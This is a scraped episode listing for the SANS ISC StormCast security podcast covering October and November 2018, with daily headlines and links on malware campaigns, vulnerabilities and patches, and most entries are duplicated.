Russian Language Malspam Pushing Shade (Troldesh) Ransomware https://isc.sans.edu/forums/diary/Russian+language+malspam+pushing+Shade+Troldesh+ransomware/24358/ Scamclub Malvertising Against iOS Users https://blog.confiant.com/malvertising-attack-hijacks-300-million-sessions-over-48-hours-9d0218fe02cd Andre Shori: To Block Or Not To Block? Impact and Analysis of Actively Blocking Shodan Scans http://www.sans.org/reading-room/whitepapers/networksecurity/block-block-impact-analysis-actively-blocking-shodan-scans-38645
11/30/201813 minutes, 59 seconds
Episode Artwork

ISC StormCast for Friday, November 30th 2018

Russian Language Malspam Pushing Shade (Troldesh) Ransomware https://isc.sans.edu/forums/diary/Russian+language+malspam+pushing+Shade+Troldesh+ransomware/24358/ Scamclub Malvertising Against iOS Users https://blog.confiant.com/malvertising-attack-hijacks-300-million-sessions-over-48-hours-9d0218fe02cd Andre Shori: To Block Or Not To Block? Impact and Analysis of Actively Blocking Shodan Scans http://www.sans.org/reading-room/whitepapers/networksecurity/block-block-impact-analysis-actively-blocking-shodan-scans-38645
11/30/201813 minutes, 59 seconds
Episode Artwork

ISC StormCast for Thursday, November 29th 2018

Obfuscated Shell Scripts: Fake MacOS Flash Updates https://isc.sans.edu/forums/diary/More+obfuscated+shell+scripts+Fake+MacOS+Flash+update/24352/ Sennheiser HeadSetup Certificate Authority Install https://www.secorvo.de/publikationen/headsetup-vulnerability-report-secorvo-2018.pdf Microsoft Fixes Shared Folder Permission Deletion Problem https://support.microsoft.com/en-us/help/4467684/windows-10-update-kb4467684 3ve Botnet Dismanteled https://services.google.com/fh/files/blogs/3ve_google_whiteops_whitepaper_final_nov_2018.pdf
11/29/20186 minutes, 19 seconds
Episode Artwork

ISC StormCast for Thursday, November 29th 2018

Obfuscated Shell Scripts: Fake MacOS Flash Updates https://isc.sans.edu/forums/diary/More+obfuscated+shell+scripts+Fake+MacOS+Flash+update/24352/ Sennheiser HeadSetup Certificate Authority Install https://www.secorvo.de/publikationen/headsetup-vulnerability-report-secorvo-2018.pdf Microsoft Fixes Shared Folder Permission Deletion Problem https://support.microsoft.com/en-us/help/4467684/windows-10-update-kb4467684 3ve Botnet Dismanteled https://services.google.com/fh/files/blogs/3ve_google_whiteops_whitepaper_final_nov_2018.pdf
11/29/20186 minutes, 19 seconds
Episode Artwork

ISC StormCast for Wednesday, November 28th 2018

Obfuscated QNAP bash Malware; https://isc.sans.edu/forums/diary/Obfuscated+bash+script+targeting+QNap+boxes/24348/ Half of All Phishing Sites Use HTTPS https://krebsonsecurity.com/2018/11/half-of-all-phishing-sites-now-have-the-padlock/ Chrome and Firefox to Remove FTP Support https://www.bleepingcomputer.com/news/google/chrome-and-firefox-developers-aim-to-remove-support-for-ftp/ California Wildfire Used in BEC Scams https://www.agari.com/identity-intelligence-blog/california-wildfire-email-scams/
11/28/20185 minutes, 24 seconds
Episode Artwork

ISC StormCast for Wednesday, November 28th 2018

Obfuscated QNAP bash Malware; https://isc.sans.edu/forums/diary/Obfuscated+bash+script+targeting+QNap+boxes/24348/ Half of All Phishing Sites Use HTTPS https://krebsonsecurity.com/2018/11/half-of-all-phishing-sites-now-have-the-padlock/ Chrome and Firefox to Remove FTP Support https://www.bleepingcomputer.com/news/google/chrome-and-firefox-developers-aim-to-remove-support-for-ftp/ California Wildfire Used in BEC Scams https://www.agari.com/identity-intelligence-blog/california-wildfire-email-scams/
11/28/20185 minutes, 24 seconds
Episode Artwork

ISC StormCast for Tuesday, November 27th 2018

ViperMonkey: VBA Maldoc Deobfuscation https://isc.sans.edu/forums/diary/ViperMonkey+VBA+maldoc+deobfuscation/24346/ Malicious NPM Libraries https://medium.com/@cnorthwood/todays-javascript-trash-fire-and-pile-on-f3efcf8ac8c7 Turning Your BMC Into A Revolving Door https://www.synacktiv.com/ressources/zeronights_2018_turning_your_bmc_into_a_revolving_door.pdf
11/27/20186 minutes, 7 seconds
Episode Artwork

ISC StormCast for Tuesday, November 27th 2018

ViperMonkey: VBA Maldoc Deobfuscation https://isc.sans.edu/forums/diary/ViperMonkey+VBA+maldoc+deobfuscation/24346/ Malicious NPM Libraries https://medium.com/@cnorthwood/todays-javascript-trash-fire-and-pile-on-f3efcf8ac8c7 Turning Your BMC Into A Revolving Door https://www.synacktiv.com/ressources/zeronights_2018_turning_your_bmc_into_a_revolving_door.pdf
11/27/20186 minutes, 7 seconds
Episode Artwork

ISC StormCast for Monday, November 26th 2018

Attacks Against Docker API https://isc.sans.edu/forums/diary/Moby+the+Shark/24340/ Mirai Like Attack Hitting Hadoop https://asert.arbornetworks.com/mirai-not-just-for-iot-anymore/ New Rowhammer Variant Effects ECC Memory https://www.vusec.net/projects/eccploit/
11/26/20185 minutes, 53 seconds
Episode Artwork

ISC StormCast for Monday, November 26th 2018

Attacks Against Docker API https://isc.sans.edu/forums/diary/Moby+the+Shark/24340/ Mirai Like Attack Hitting Hadoop https://asert.arbornetworks.com/mirai-not-just-for-iot-anymore/ New Rowhammer Variant Effects ECC Memory https://www.vusec.net/projects/eccploit/
11/26/20185 minutes, 53 seconds
Episode Artwork

ISC StormCast for Wednesday, November 21st 2018

Critical Flash Update https://helpx.adobe.com/security/products/flash-player/apsb18-44.html Thanksgiving Lure for Emotet https://www.forcepoint.com/blog/security-labs/thanks-giving-emotet
11/21/20183 minutes, 12 seconds
Episode Artwork

ISC StormCast for Wednesday, November 21st 2018

Critical Flash Update https://helpx.adobe.com/security/products/flash-player/apsb18-44.html Thanksgiving Lure for Emotet https://www.forcepoint.com/blog/security-labs/thanks-giving-emotet
11/21/20183 minutes, 12 seconds
Episode Artwork

ISC StormCast for Tuesday, November 20th 2018

Google Play Malware https://twitter.com/LukasStefanko ATM Vulnerabilities https://www.ptsecurity.com/upload/corporate/ww-en/analytics/ATM-Vulnerabilities-2018-eng.pdf Nagios XI Update https://www.tenable.com/security/research/tra-2018-37
11/20/20184 minutes, 43 seconds
Episode Artwork

ISC StormCast for Tuesday, November 20th 2018

Google Play Malware https://twitter.com/LukasStefanko ATM Vulnerabilities https://www.ptsecurity.com/upload/corporate/ww-en/analytics/ATM-Vulnerabilities-2018-eng.pdf Nagios XI Update https://www.tenable.com/security/research/tra-2018-37
11/20/20184 minutes, 43 seconds
Episode Artwork

ISC StormCast for Monday, November 19th 2018

Multipurpose PCAP Analysis Tool https://isc.sans.edu/forums/diary/Multipurpose+PCAP+Analysis+Tool/24322/ Quickly Investigating Websites with Lookyloo https://isc.sans.edu/forums/diary/Quickly+Investigating+Websites+with+Lookyloo/24320/ From Field Spoofing in GMail https://blog.cotten.io/hacking-gmail-with-weird-from-fields-d6494254722f?gi=ce61de4cb006
11/18/20185 minutes, 29 seconds
Episode Artwork

ISC StormCast for Monday, November 19th 2018

Multipurpose PCAP Analysis Tool https://isc.sans.edu/forums/diary/Multipurpose+PCAP+Analysis+Tool/24322/ Quickly Investigating Websites with Lookyloo https://isc.sans.edu/forums/diary/Quickly+Investigating+Websites+with+Lookyloo/24320/ From Field Spoofing in GMail https://blog.cotten.io/hacking-gmail-with-weird-from-fields-d6494254722f?gi=ce61de4cb006
11/18/20185 minutes, 29 seconds
Episode Artwork

ISC StormCast for Friday, November 16th 2018

Emotet Spreading IcedID Banking Malware https://isc.sans.edu/forums/diary/Emotet+infection+with+IcedID+banking+Trojan/24312/ Crypto Miners Abusing Insecure Docker Installs https://forums.juniper.net/t5/Threat-Research/Container-Malware-Miners-Go-Docker-Hunting-In-The-Cloud/ba-p/400587 GPS Watches Can Be Used To Track Kids https://www.pentestpartners.com/security-blog/tracking-and-snooping-on-a-million-kids/ Firefox Will Notify Users of Breached Sites https://blog.mozilla.org/blog/2018/11/14/firefox-monitor-launches-in-26-languages-and-adds-new-desktop-browser-feature/ David Kennel: All-Seeing Eye or Blind Man? Understanding the Linux Kernel Auditing System https://www.sans.org/reading-room/whitepapers/linux/all-seeing-eye-blind-man-understanding-linux-kernel-auditing-system-38605
11/16/201814 minutes, 59 seconds
Episode Artwork

ISC StormCast for Friday, November 16th 2018

Emotet Spreading IcedID Banking Malware https://isc.sans.edu/forums/diary/Emotet+infection+with+IcedID+banking+Trojan/24312/ Crypto Miners Abusing Insecure Docker Installs https://forums.juniper.net/t5/Threat-Research/Container-Malware-Miners-Go-Docker-Hunting-In-The-Cloud/ba-p/400587 GPS Watches Can Be Used To Track Kids https://www.pentestpartners.com/security-blog/tracking-and-snooping-on-a-million-kids/ Firefox Will Notify Users of Breached Sites https://blog.mozilla.org/blog/2018/11/14/firefox-monitor-launches-in-26-languages-and-adds-new-desktop-browser-feature/ David Kennel: All-Seeing Eye or Blind Man? Understanding the Linux Kernel Auditing System https://www.sans.org/reading-room/whitepapers/linux/all-seeing-eye-blind-man-understanding-linux-kernel-auditing-system-38605
11/16/201814 minutes, 59 seconds
Episode Artwork

ISC StormCast for Thursday, November 15th 2018

Details about Zero Day Exploit Taking Advantage of Win32k Vuln. https://securelist.com/a-new-exploit-for-zero-day-vulnerability-cve-2018-8589/88845/ PacSec Pwn2Own Results https://www.zerodayinitiative.com/blog/2018/11/13/pwn2own-tokyo-2018-day-one-results https://www.zerodayinitiative.com/blog/2018/11/14/pwn2own-tokyo-2018-day-two-results-and-master-of-pwn More Spectre/Meltdown Flaws https://arxiv.org/pdf/1811.05441.pdf
11/15/20185 minutes, 48 seconds
Episode Artwork

ISC StormCast for Thursday, November 15th 2018

Details about Zero Day Exploit Taking Advantage of Win32k Vuln. https://securelist.com/a-new-exploit-for-zero-day-vulnerability-cve-2018-8589/88845/ PacSec Pwn2Own Results https://www.zerodayinitiative.com/blog/2018/11/13/pwn2own-tokyo-2018-day-one-results https://www.zerodayinitiative.com/blog/2018/11/14/pwn2own-tokyo-2018-day-two-results-and-master-of-pwn More Spectre/Meltdown Flaws https://arxiv.org/pdf/1811.05441.pdf
11/15/20185 minutes, 48 seconds
Episode Artwork

ISC StormCast for Wednesday, November 14th 2018

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/November+2018+Microsoft+Patch+Tuesday/24308/ Adobe Security Bulletins https://helpx.adobe.com/security.html
11/14/20185 minutes, 6 seconds
Episode Artwork

ISC StormCast for Wednesday, November 14th 2018

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/November+2018+Microsoft+Patch+Tuesday/24308/ Adobe Security Bulletins https://helpx.adobe.com/security.html
11/14/20185 minutes, 6 seconds
Episode Artwork

ISC StormCast for Tuesday, November 13th 2018

Google BGP Hijack via Russia https://twitter.com/thousandeyes/status/1062102171506765825 https://www.wsj.com/articles/google-internet-traffic-is-briefly-misdirected-through-russia-china-1542068392 Microcode Bootloader USB https://www.techpowerup.com/forums/threads/intel-microcode-boot-loader.248858/ Wordpress GDPR Tool Vulnerable https://www.wordfence.com/blog/2018/11/trends-following-vulnerability-in-wp-gdpr-compliance-plugin/
11/13/20185 minutes, 17 seconds
Episode Artwork

ISC StormCast for Tuesday, November 13th 2018

Google BGP Hijack via Russia https://twitter.com/thousandeyes/status/1062102171506765825 https://www.wsj.com/articles/google-internet-traffic-is-briefly-misdirected-through-russia-china-1542068392 Microcode Bootloader USB https://www.techpowerup.com/forums/threads/intel-microcode-boot-loader.248858/ Wordpress GDPR Tool Vulnerable https://www.wordfence.com/blog/2018/11/trends-following-vulnerability-in-wp-gdpr-compliance-plugin/
11/13/20185 minutes, 17 seconds
Episode Artwork

ISC StormCast for Monday, November 12th 2018

Cloudflare Releases Mobile Apps To Use 1.1.1.1 https://blog.cloudflare.com/1-thing-you-can-do-to-make-your-internet-safer-and-faster/ Crypto Coin Miners Now With Rootkits https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/cryptocurrency-mining-malware-targets-linux-systems-uses-rootkit-for-stealth Google Play Protect Reduces Malware https://security.googleblog.com/2018/11/introducing-android-ecosystem-security.html
11/12/20186 minutes, 28 seconds
Episode Artwork

ISC StormCast for Monday, November 12th 2018

Cloudflare Releases Mobile Apps To Use 1.1.1.1 https://blog.cloudflare.com/1-thing-you-can-do-to-make-your-internet-safer-and-faster/ Crypto Coin Miners Now With Rootkits https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/cryptocurrency-mining-malware-targets-linux-systems-uses-rootkit-for-stealth Google Play Protect Reduces Malware https://security.googleblog.com/2018/11/introducing-android-ecosystem-security.html
11/12/20186 minutes, 28 seconds
Episode Artwork

ISC StormCast for Friday, November 9th 2018

Cisco Security Bulletins https://tools.cisco.com/security/center/publicationListing.x Ruby Deserialization https://www.elttam.com.au/blog/ruby-deserialization/ Ouch Newsletter: Am I Hacked? https://www.sans.org/security-awareness-training/resources/am-i-hacked Jonathan Sweeny: Smart Contract Botnets https://www.sans.org/reading-room/whitepapers/covert/botnet-resiliency-private-blockchains-38050 https://www.sans.org/reading-room/whitepapers/warfare/tearing-smart-contract-botnets-38650
11/9/201817 minutes, 10 seconds
Episode Artwork

ISC StormCast for Friday, November 9th 2018

Cisco Security Bulletins https://tools.cisco.com/security/center/publicationListing.x Ruby Deserialization https://www.elttam.com.au/blog/ruby-deserialization/ Ouch Newsletter: Am I Hacked? https://www.sans.org/security-awareness-training/resources/am-i-hacked Jonathan Sweeny: Smart Contract Botnets https://www.sans.org/reading-room/whitepapers/covert/botnet-resiliency-private-blockchains-38050 https://www.sans.org/reading-room/whitepapers/warfare/tearing-smart-contract-botnets-38650
11/9/201817 minutes, 10 seconds
Episode Artwork

ISC StormCast for Thursday, November 8th 2018

VirtualBox 0 Day Guest Escape Exploit Released https://github.com/MorteNoir1/virtualbox_e1000_0day WooCommerce / Wordpress Bug Leads to RCE https://blog.ripstech.com/2018/wordpress-design-flaw-leads-to-woocommerce-rce/ Bing Advertises Fake Version of Notepad2 https://www.bleepingcomputer.com/news/security/beware-of-unofficial-sites-pushing-notepad2-adware-bundles/ Jacksonville BSides https://bsidesjax.org
11/8/20186 minutes, 41 seconds
Episode Artwork

ISC StormCast for Thursday, November 8th 2018

VirtualBox 0 Day Guest Escape Exploit Released https://github.com/MorteNoir1/virtualbox_e1000_0day WooCommerce / Wordpress Bug Leads to RCE https://blog.ripstech.com/2018/wordpress-design-flaw-leads-to-woocommerce-rce/ Bing Advertises Fake Version of Notepad2 https://www.bleepingcomputer.com/news/security/beware-of-unofficial-sites-pushing-notepad2-adware-bundles/ Jacksonville BSides https://bsidesjax.org
11/8/20186 minutes, 41 seconds
Episode Artwork

ISC StormCast for Wednesday, November 7th 2018

China Telecom's Internet Traffic Misdirection https://internetintel.oracle.com/blog-single.html?id=China+Telecom%27s+Internet+Traffic+Misdirection Android Security Updates; Last for Nexus https://source.android.com/security/bulletin/2018-11-01#framework PoC Facetime Exploit https://bugs.chromium.org/p/project-zero/issues/detail?id=1641 Vulnerability in U-Boot Bootloader https://github.com/inversepath/usbarmory/blob/master/software/secure_boot/Security_Advisory-Ref_IPVR2018-0001.txt
11/7/20185 minutes, 50 seconds
Episode Artwork

ISC StormCast for Wednesday, November 7th 2018

China Telecom's Internet Traffic Misdirection https://internetintel.oracle.com/blog-single.html?id=China+Telecom%27s+Internet+Traffic+Misdirection Android Security Updates; Last for Nexus https://source.android.com/security/bulletin/2018-11-01#framework PoC Facetime Exploit https://bugs.chromium.org/p/project-zero/issues/detail?id=1641 Vulnerability in U-Boot Bootloader https://github.com/inversepath/usbarmory/blob/master/software/secure_boot/Security_Advisory-Ref_IPVR2018-0001.txt
11/7/20185 minutes, 50 seconds
Episode Artwork

ISC StormCast for Tuesday, November 6th 2018

Struts 2.3 Uses Outdated commons-fileupload library https://isc.sans.edu/forums/diary/Struts+23+Vulnerable+to+Two+Year+old+File+Upload+Flaw/24278/ Fake Elon Musk Tweet used to steal Bitcoin https://www.bleepingcomputer.com/news/security/fake-elon-musk-twitter-bitcoin-scam-earned-180k-in-one-day/ Bypassing SSD Drive Hardware Encryption https://www.ru.nl/english/news-agenda/news/vm/icis/cyber-security/2018/radboud-university-researchers-discover-security/
11/6/20185 minutes, 48 seconds
Episode Artwork

ISC StormCast for Tuesday, November 6th 2018

Struts 2.3 Uses Outdated commons-fileupload library https://isc.sans.edu/forums/diary/Struts+23+Vulnerable+to+Two+Year+old+File+Upload+Flaw/24278/ Fake Elon Musk Tweet used to steal Bitcoin https://www.bleepingcomputer.com/news/security/fake-elon-musk-twitter-bitcoin-scam-earned-180k-in-one-day/ Bypassing SSD Drive Hardware Encryption https://www.ru.nl/english/news-agenda/news/vm/icis/cyber-security/2018/radboud-university-researchers-discover-security/
11/6/20185 minutes, 48 seconds
Episode Artwork

ISC StormCast for Monday, November 5th 2018

Beyond good ol' LaunchAgents https://isc.sans.edu/forums/diary/Beyond+good+ol+LaunchAgent+part+1/24274/ Dissecting a CVE-2017-11882 Exploit https://isc.sans.edu/forums/diary/Dissecting+a+CVE201711882+Exploit/24272/ Microsoft Edge Exploit About to Be Released https://twitter.com/Yux1xi Portsmash Vulnerability https://github.com/bbbrumley/portsmash RC4 (Arcfour) Depreciation in SSH https://tools.ietf.org/html/draft-ietf-curdle-rc4-die-die-die-12
11/5/20185 minutes, 18 seconds
Episode Artwork

ISC StormCast for Monday, November 5th 2018

Beyond good ol' LaunchAgents https://isc.sans.edu/forums/diary/Beyond+good+ol+LaunchAgent+part+1/24274/ Dissecting a CVE-2017-11882 Exploit https://isc.sans.edu/forums/diary/Dissecting+a+CVE201711882+Exploit/24272/ Microsoft Edge Exploit About to Be Released https://twitter.com/Yux1xi Portsmash Vulnerability https://github.com/bbbrumley/portsmash RC4 (Arcfour) Depreciation in SSH https://tools.ietf.org/html/draft-ietf-curdle-rc4-die-die-die-12
11/5/20185 minutes, 18 seconds
Episode Artwork

ISC StormCast for Friday, November 2nd 2018

Windows Defender Sandboxing Bug https://isc.sans.edu/forums/diary/Windows+Defenders+Sandbox/24266/ Bleedingbit Bluetooth Low Energy Vulnerability https://armis.com/bleedingbit/ Cisco ASA/Firepower DoS Vulnerability Actively Exploited https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181031-asaftd-sip-dos
11/1/20185 minutes, 29 seconds
Episode Artwork

ISC StormCast for Friday, November 2nd 2018

Windows Defender Sandboxing Bug https://isc.sans.edu/forums/diary/Windows+Defenders+Sandbox/24266/ Bleedingbit Bluetooth Low Energy Vulnerability https://armis.com/bleedingbit/ Cisco ASA/Firepower DoS Vulnerability Actively Exploited https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181031-asaftd-sip-dos
11/1/20185 minutes, 29 seconds
Episode Artwork

ISC StormCast for Thursday, November 1st 2018

Encrypted Word Maldocs https://isc.sans.edu/forums/diary/More+malspam+using+passwordprotected+Word+docs/24262/ iOS / MacOS ICMP Error Remote Code Execution https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407 iOS Lock Screen Bypass https://www.youtube.com/watch?v=ojigFgwrtKs
11/1/20185 minutes, 19 seconds
Episode Artwork

ISC StormCast for Thursday, November 1st 2018

Encrypted Word Maldocs https://isc.sans.edu/forums/diary/More+malspam+using+passwordprotected+Word+docs/24262/ iOS / MacOS ICMP Error Remote Code Execution https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407 iOS Lock Screen Bypass https://www.youtube.com/watch?v=ojigFgwrtKs
11/1/20185 minutes, 19 seconds
Episode Artwork

ISC StormCast for Wednesday, October 31st 2018

Change in Strategy for Hancitor Malware https://isc.sans.edu/forums/diary/Campaign+evolution+Hancitor+malspam+starts+pushing+Ursnif+this+week/24256/ Apple Updates https://support.apple.com/en-us/HT201222 Telegram Stores Conversations Locally https://twitter.com/nathanielrsuchy
10/31/20184 minutes, 36 seconds
Episode Artwork

ISC StormCast for Wednesday, October 31st 2018

Change in Strategy for Hancitor Malware https://isc.sans.edu/forums/diary/Campaign+evolution+Hancitor+malspam+starts+pushing+Ursnif+this+week/24256/ Apple Updates https://support.apple.com/en-us/HT201222 Telegram Stores Conversations Locally https://twitter.com/nathanielrsuchy
10/31/20184 minutes, 36 seconds
Episode Artwork

ISC StormCast for Tuesday, October 30th 2018

Maldoc Duplicating PowerShell https://isc.sans.edu/forums/diary/Maldoc+Duplicating+PowerShell+Prior+to+Use/24254/ New File Types Emerge in Malware Spam Attachments https://blog.trendmicro.com/trendlabs-security-intelligence/same-old-yet-brand-new-new-file-types-emerge-in-malware-spam-attachments/ Malicious Mac Crypto Currency Tracker Installs Backdoor https://blog.malwarebytes.com/threat-analysis/2018/10/mac-cryptocurrency-ticker-app-installs-backdoors/ Sandbox For Windows Defender https://cloudblogs.microsoft.com/microsoftsecure/2018/10/26/windows-defender-antivirus-can-now-run-in-a-sandbox/
10/30/20186 minutes, 3 seconds
Episode Artwork

ISC StormCast for Tuesday, October 30th 2018

Maldoc Duplicating PowerShell https://isc.sans.edu/forums/diary/Maldoc+Duplicating+PowerShell+Prior+to+Use/24254/ New File Types Emerge in Malware Spam Attachments https://blog.trendmicro.com/trendlabs-security-intelligence/same-old-yet-brand-new-new-file-types-emerge-in-malware-spam-attachments/ Malicious Mac Crypto Currency Tracker Installs Backdoor https://blog.malwarebytes.com/threat-analysis/2018/10/mac-cryptocurrency-ticker-app-installs-backdoors/ Sandbox For Windows Defender https://cloudblogs.microsoft.com/microsoftsecure/2018/10/26/windows-defender-antivirus-can-now-run-in-a-sandbox/
10/30/20186 minutes, 3 seconds
Episode Artwork

ISC StormCast for Monday, October 29th 2018

Dissecting Malicious Office Documents in Linux https://isc.sans.edu/forums/diary/Dissecting+Malicious+Office+Documents+with+Linux/24248/ Analyzing Compressed RTF Documents https://isc.sans.edu/forums/diary/Detecting+Compressed+RTF/24250/ SystemD DHCPv6 Remote Code Executing Vulnerability https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-15688 Cryptominers Scan for Docker Engine https://blog.trendmicro.com/trendlabs-security-intelligence/misconfigured-container-abused-to-deliver-cryptocurrency-mining-malware DemonBot Targeting Hadoop https://blog.radware.com/security/2018/10/new-demonbot-discovered/
10/29/20184 minutes, 55 seconds
Episode Artwork

ISC StormCast for Monday, October 29th 2018

Dissecting Malicious Office Documents in Linux https://isc.sans.edu/forums/diary/Dissecting+Malicious+Office+Documents+with+Linux/24248/ Analyzing Compressed RTF Documents https://isc.sans.edu/forums/diary/Detecting+Compressed+RTF/24250/ SystemD DHCPv6 Remote Code Executing Vulnerability https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-15688 Cryptominers Scan for Docker Engine https://blog.trendmicro.com/trendlabs-security-intelligence/misconfigured-container-abused-to-deliver-cryptocurrency-mining-malware DemonBot Targeting Hadoop https://blog.radware.com/security/2018/10/new-demonbot-discovered/
10/29/20184 minutes, 55 seconds
Episode Artwork

ISC StormCast for Friday, October 26th 2018

Scam Calls Targeting Chinese Living in the US https://isc.sans.edu/forums/diary/Fake+BankPost+Office+Phone+Calls+Targeting+Chinese+Immigrants/24244/ X.org Privilege Elevation Flaw https://lists.x.org/archives/xorg-announce/2018-October/002927.html Remote Videos in Office Documents https://blog.cymulate.com/abusing-microsoft-office-online-video Mac Malware Injects Ads https://blog.malwarebytes.com/threat-analysis/2018/10/mac-malware-intercepts-encrypted-web-traffic-for-ad-injection/
10/26/20185 minutes, 13 seconds
Episode Artwork

ISC StormCast for Friday, October 26th 2018

Scam Calls Targeting Chinese Living in the US https://isc.sans.edu/forums/diary/Fake+BankPost+Office+Phone+Calls+Targeting+Chinese+Immigrants/24244/ X.org Privilege Elevation Flaw https://lists.x.org/archives/xorg-announce/2018-October/002927.html Remote Videos in Office Documents https://blog.cymulate.com/abusing-microsoft-office-online-video Mac Malware Injects Ads https://blog.malwarebytes.com/threat-analysis/2018/10/mac-malware-intercepts-encrypted-web-traffic-for-ad-injection/
10/26/20185 minutes, 13 seconds
Episode Artwork

ISC StormCast for Thursday, October 25th 2018

Reversing AutoIT https://isc.sans.edu/forums/diary/Diving+into+Malicious+AutoIT+Code/24238/ Arcserve Vulnerabilities https://www.digitaldefense.com/blog/zero-day-alerts/arcserve-disclosure/ WebExec Vulnerability https://webexec.org/ More ALPC Flaws from Sandbox Escaper https://twitter.com/SandboxEscaper/status/1054744201244692485 https://twitter.com/mkolsek/status/1054794984908562432
10/25/20185 minutes, 24 seconds
Episode Artwork

ISC StormCast for Thursday, October 25th 2018

Reversing AutoIT https://isc.sans.edu/forums/diary/Diving+into+Malicious+AutoIT+Code/24238/ Arcserve Vulnerabilities https://www.digitaldefense.com/blog/zero-day-alerts/arcserve-disclosure/ WebExec Vulnerability https://webexec.org/ More ALPC Flaws from Sandbox Escaper https://twitter.com/SandboxEscaper/status/1054744201244692485 https://twitter.com/mkolsek/status/1054794984908562432
10/25/20185 minutes, 24 seconds
Episode Artwork

ISC StormCast for Wednesday, October 24th 2018

Malware Uses Decoy Picture https://isc.sans.edu/forums/diary/Malicious+Powershell+using+a+Decoy+Picture/24234/ DNS over HTTPS Pushback https://twitter.com/paulvixie/status/1053765281917661184 Signal Desktop Leaves Encryption Key Exposed https://twitter.com/nathanielrsuchy Firefox 63 Allows Less Tracking https://blog.mozilla.org/security/2018/10/23/firefox-63-lets-users-block-tracking-cookies/
10/24/20185 minutes, 56 seconds
Episode Artwork

ISC StormCast for Wednesday, October 24th 2018

Malware Uses Decoy Picture https://isc.sans.edu/forums/diary/Malicious+Powershell+using+a+Decoy+Picture/24234/ DNS over HTTPS Pushback https://twitter.com/paulvixie/status/1053765281917661184 Signal Desktop Leaves Encryption Key Exposed https://twitter.com/nathanielrsuchy Firefox 63 Allows Less Tracking https://blog.mozilla.org/security/2018/10/23/firefox-63-lets-users-block-tracking-cookies/
10/24/20185 minutes, 56 seconds
Episode Artwork

ISC StormCast for Tuesday, October 23rd 2018

MSG Files: Compressed RTF https://isc.sans.edu/forums/diary/MSG+Files+Compressed+RTF/24228/ FreeRTOS TCP/IP Stack Vulnerabilities https://blog.zimperium.com/freertos-tcpip-stack-vulnerabilities-put-wide-range-devices-risk-compromise-smart-homes-critical-infrastructure-systems/ VLC/Live555 RTSP Server Vulnerability https://www.talosintelligence.com/reports/TALOS-2018-0684 Microsoft Yammer Update https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8569#ID0EGB
10/23/20185 minutes, 18 seconds
Episode Artwork

ISC StormCast for Tuesday, October 23rd 2018

MSG Files: Compressed RTF https://isc.sans.edu/forums/diary/MSG+Files+Compressed+RTF/24228/ FreeRTOS TCP/IP Stack Vulnerabilities https://blog.zimperium.com/freertos-tcpip-stack-vulnerabilities-put-wide-range-devices-risk-compromise-smart-homes-critical-infrastructure-systems/ VLC/Live555 RTSP Server Vulnerability https://www.talosintelligence.com/reports/TALOS-2018-0684 Microsoft Yammer Update https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8569#ID0EGB
10/23/20185 minutes, 18 seconds
Episode Artwork

ISC StormCast for Monday, October 22nd 2018

MacOS LaunchAgent https://isc.sans.edu/forums/diary/Beyond+good+ol+LaunchAgent+part+0/24230/ TLS Session Tracking https://arxiv.org/pdf/1810.07304.pdf jQuery File Upload Plugin https://blogs.akamai.com/sitr/2018/10/having-the-security-rug-pulled-out-from-under-you.html Drupal Update https://www.drupal.org/sa-core-2018-006
10/22/20185 minutes, 2 seconds
Episode Artwork

ISC StormCast for Monday, October 22nd 2018

MacOS LaunchAgent https://isc.sans.edu/forums/diary/Beyond+good+ol+LaunchAgent+part+0/24230/ TLS Session Tracking https://arxiv.org/pdf/1810.07304.pdf jQuery File Upload Plugin https://blogs.akamai.com/sitr/2018/10/having-the-security-rug-pulled-out-from-under-you.html Drupal Update https://www.drupal.org/sa-core-2018-006
10/22/20185 minutes, 2 seconds
Episode Artwork

ISC StormCast for Friday, October 19th 2018

Cisco Patches https://tools.cisco.com/security/center/Search.x?publicationTypeIDs=1&firstPublishedStartDate=2018%2F10%2F17&firstPublishedEndDate=2018%2F10%2F17&lastPublishedStartDate=2018%2F10%2F17&lastPublishedEndDate=2018%2F10%2F17 51% Attack Against Crypto Currencies https://old.reddit.com/r/CryptoCurrency/comments/9m1uuj/if_i_livestreamed_the_setup_and_execution_of/ VMWare Patch https://www.vmware.com/au/security/advisories/VMSA-2018-0026.html
10/19/20184 minutes, 27 seconds
Episode Artwork

ISC StormCast for Friday, October 19th 2018

Cisco Patches https://tools.cisco.com/security/center/Search.x?publicationTypeIDs=1&firstPublishedStartDate=2018%2F10%2F17&firstPublishedEndDate=2018%2F10%2F17&lastPublishedStartDate=2018%2F10%2F17&lastPublishedEndDate=2018%2F10%2F17 51% Attack Against Crypto Currencies https://old.reddit.com/r/CryptoCurrency/comments/9m1uuj/if_i_livestreamed_the_setup_and_execution_of/ VMWare Patch https://www.vmware.com/au/security/advisories/VMSA-2018-0026.html
10/19/20184 minutes, 27 seconds
Episode Artwork

ISC StormCast for Thursday, October 18th 2018

Abandoned "NewShareCount" Twitter Counter abused https://blog.sucuri.net/2018/10/malicious-redirects-from-newsharecounts-com-tweet-counter.html Multiple D-Link Vulnerabilities https://seclists.org/fulldisclosure/2018/Oct/36 RID Hacking in Windows https://www.romhack.io/slides/RomHack%202018%20-%20Sebastian%20Castro%20-%20Windows%20RID%20Hijacking:%20Maintaining%20Access%20on%20Windows%20Machines.pdf
10/18/20185 minutes, 22 seconds
Episode Artwork

ISC StormCast for Thursday, October 18th 2018

Abandoned "NewShareCount" Twitter Counter abused https://blog.sucuri.net/2018/10/malicious-redirects-from-newsharecounts-com-tweet-counter.html Multiple D-Link Vulnerabilities https://seclists.org/fulldisclosure/2018/Oct/36 RID Hacking in Windows https://www.romhack.io/slides/RomHack%202018%20-%20Sebastian%20Castro%20-%20Windows%20RID%20Hijacking:%20Maintaining%20Access%20on%20Windows%20Machines.pdf
10/18/20185 minutes, 22 seconds
Episode Artwork

ISC StormCast for Wednesday, October 17th 2018

